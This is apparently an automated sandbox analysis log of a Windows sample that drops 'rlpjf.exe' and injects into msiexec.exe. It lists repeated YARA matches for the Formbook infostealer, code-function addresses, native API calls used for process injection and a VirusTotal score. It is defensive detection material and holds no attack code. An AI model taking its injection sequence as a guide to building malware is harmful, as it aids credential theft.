          Source: 0000000F.00000002.535781474.0000000000D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.276935355.0000000000F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.276935355.0000000000F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.386017392.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.386017392.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.385893356.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.385893356.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.343083736.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.343083736.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.273462399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.273462399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.318820789.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.318820789.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.535983795.0000000000F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.535983795.0000000000F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.274763055.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.274763055.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.535866445.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.535866445.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: lamsddre43321.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 2.0.rlpjf.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.rlpjf.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.rlpjf.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.rlpjf.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.rlpjf.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.rlpjf.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.rlpjf.exe.f70000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.rlpjf.exe.f70000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.rlpjf.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.rlpjf.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.rlpjf.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.rlpjf.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.rlpjf.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.rlpjf.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.rlpjf.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.rlpjf.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.rlpjf.exe.f70000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.rlpjf.exe.f70000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.386123564.0000000001820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.386123564.0000000001820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.535781474.0000000000D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.535781474.0000000000D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.276935355.0000000000F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.276935355.0000000000F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.386017392.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.386017392.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.385893356.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.385893356.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.343083736.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.343083736.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.273462399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.273462399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.318820789.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.318820789.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.535983795.0000000000F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.535983795.0000000000F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.274763055.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.274763055.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.535866445.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.535866445.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\lamsddre43321.exeCode function: 0_2_004032FA EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\lamsddre43321.exeCode function: 0_2_004047EE
          Source: C:\Users\user\Desktop\lamsddre43321.exeCode function: 0_2_00406083
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 1_2_001A5219
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 1_2_001B6880
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 1_2_001B496E
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 1_2_001B959D
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 1_2_001B7364
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 1_2_001B496E
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 1_2_001B959D
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 1_2_001B6880
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 1_2_001B85D1
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 1_2_001B6DF2
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 1_2_001B85D1
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 1_2_001A5267
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 1_2_001B85D1
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 1_2_001B7364
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 1_2_00ED0A64
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_001B6880
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_001B496E
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_001B959D
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_001B7364
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_001B496E
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_001B959D
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_001B6880
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_001B85D1
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_001B6DF2
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_001B85D1
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_001B85D1
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_001B7364
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_0041D88B
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_0041C3E6
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_00402D87
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_0041D5A6
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_0041E5BF
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_00409E5B
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_00409E60
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_0041D7B1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05092D07
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05091D55
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_050925DD
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD841F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FDD5E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0508D466
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF2581
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FC0D20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0509DFCE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FE6E30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05091FF1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0508D616
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05092EF7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF20A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FDB090
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05081002
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0509E824
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_050920A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FE4120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_050928EC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FCF900
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05092B28
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_050803DA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0508DBD2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FFEBB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_050922AE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00D5D88B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00D5C3E6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00D42D90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00D42D87
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00D5E5BF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00D5D5A6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00D49E5B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00D49E60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00D42FB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00D5D7B1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 04FCB150 appears 45 times
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: String function: 001AEFF0 appears 42 times
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_0041A360 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_0041A410 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_0041A490 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_0041A540 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_0041A48A NtClose,
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_0041A53B NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05009540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_050095D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05009710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05009780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05009FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_050096D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_050096E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05009910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_050099A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05009840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05009860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05009A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05009520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0500AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05009560 NtWriteFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_050095F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0500A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05009730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05009760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0500A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05009770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_050097A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05009610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05009650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05009660 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05009670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05009950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_050099D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05009820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0500B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_050098A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_050098F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05009B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0500A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05009A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05009A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05009A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05009A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00D5A360 NtCreateFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00D5A490 NtClose,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00D5A410 NtReadFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00D5A48A NtClose,
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
          Source: lamsddre43321.exeVirustotal: Detection: 43%
